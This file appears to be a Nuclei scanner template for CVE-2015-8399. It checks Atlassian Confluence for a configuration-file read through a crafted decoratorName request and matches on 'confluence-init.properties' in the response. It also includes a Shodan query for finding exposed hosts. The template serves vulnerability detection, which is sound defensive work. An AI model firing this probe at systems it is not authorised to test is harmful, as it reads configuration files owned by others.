nuclei-templates/cves/2015/CVE-2015-8399.yaml

38 lines
1.2 KiB
YAML

id: CVE-2015-8399
info:
name: Atlassian Confluence configuration files read
author: princechaddha
severity: medium
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
reference:
- https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
- https://www.exploit-db.com/exploits/39170/
- http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2015-8399
cwe-id: CWE-200
metadata:
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2015,atlassian,confluence
requests:
- method: GET
path:
- "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "confluence-init.properties"
- "View Default Decorator"
condition: and